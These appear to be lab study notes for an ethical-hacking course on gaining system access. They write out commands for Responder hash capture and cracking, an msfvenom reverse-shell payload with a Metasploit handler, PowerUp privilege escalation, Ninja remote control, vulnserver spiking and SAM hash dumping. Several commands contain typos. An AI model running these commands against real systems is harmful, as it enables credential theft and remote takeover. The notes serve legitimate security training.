1. Gain access to the system

1. Crack the password using Responder

LLMNR (link local multicast name resolution) and NBT-NS (netbios namer service) are used to performe name resolution on the local link.

Responder is LLMNR, NBT-NS, MDNS poisoner. By default the tool only responds to SMB.

check the interfaces

ifconfig

Now run responder on the interface.

sudo responder -I ens33

Now when a user on the LAN try to access the unavailable share, responder will capture the hash.

logs are stored in /usr/share/responder folder. We will have a hash. Now crack it with John.

on ubuntu you can install john as

sudo snap install john-the-ripper
sudo john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt

2. Audit system passwords using Lophtcrack

windows tool. Can crack other password on remote machine if you know a single account utilizing SMB. Use password auditing. use password auditing wizard.

3. Find Vulnerabilities on exploit sites

Offensive Security’s Exploit Database Archive

4. Exploit client side vulnerabilities and get a VNC session

create msfvenom payload

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.ex

using apache to transfer the file

mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chmod -R www-data:www-data /var/www/html/share
service apche2 start

Now run msfconsole

msfconsole
use exploit/multi/handler

set the payload type, port and IP and visit the IP to download the executable. Run it you will get the shell

You can run the following commands in meterpreter.

sysinfo  //get system information

upload file through meterpreter

the powersploit priv escaltion script./usr/share/windows-resources/powersploit

upload PowerUp.ps1 powerup.ps1

Now get shell

shell

Now execute the script

powershell -ExecutionPolicy bypass -command ". .\powerup.ps1;invoke-All-Checks"

Now exit it and to get a VNC from meterpreter use the following command.

run vnc

5. Gain access to a system using armitage

GUI based msf

service postgresql start

Now run armitage from Applications menu. Run intense scan. and then we can create a payload according to our target.

Once the victim opens the payload, we get the session.

6. Gain access to system using Ninja Jonin

Ninja is installed on target and Jonin on attacker machine.

GitHub - ErAz7/Ninja: A general-purpose fully customizable software to control a remote computer behind any NAT, Firewall and proxy. Providing secure shell access, file transfer and shell stream (stream shell output from remote to a local file). Ninja has no prerequisites, you can just download the release and use it right away!GitHub

We need to edit its config file to change the ip and port.

Open the Jonin listenere. it will catch the sessions.

list  //to list all sessions
connect 1 //to connect to session
//to get to cmd
change
cmd
help //displays help

7. Buffer Overflow (To do list)

Reference

Simple Stack Based Buffer Overflow Tutorial for Vulnserver · The Grey Corner

Tools required

GitHub - stephenbradshaw/vulnserver: Vulnerable server used for learning software exploitationGitHub

Immunity requires python 2

Run vulnserver. open debugger and attach the process. click on run to execute it.

connect to server from attacking machine (netcat)

nc -nv 10.10.10.10 9999

a. Spiking

Type help to see a list of commands supported by the server.

Now lets spike the commands one by one. create a new file

pluma stats.spk

Paste the following script in it.

s_readline();
s_string("STATS");
s_string_variable("0");

Save the script. Now test the script.

generic_send_tcp 10.10.1.11 9999 stats.spk 0 0

if program does not crash on windows. The parameter is not vulnerable. Now lets test the other parameter.

pluma trun.spk    // create a file
s_readline();
s_string("TRUN");
s_string_variable("0");
generic_send_tcp 10.10.1.11 9999 stats.spk 0 0  \\send the script

The program in immunity debugger will appear as paused and registers will be overwitten with A.

b. fuzzing

System Password hacking

# To Dump Windows SAM file hashes
pwDump7.exe> hashes.txt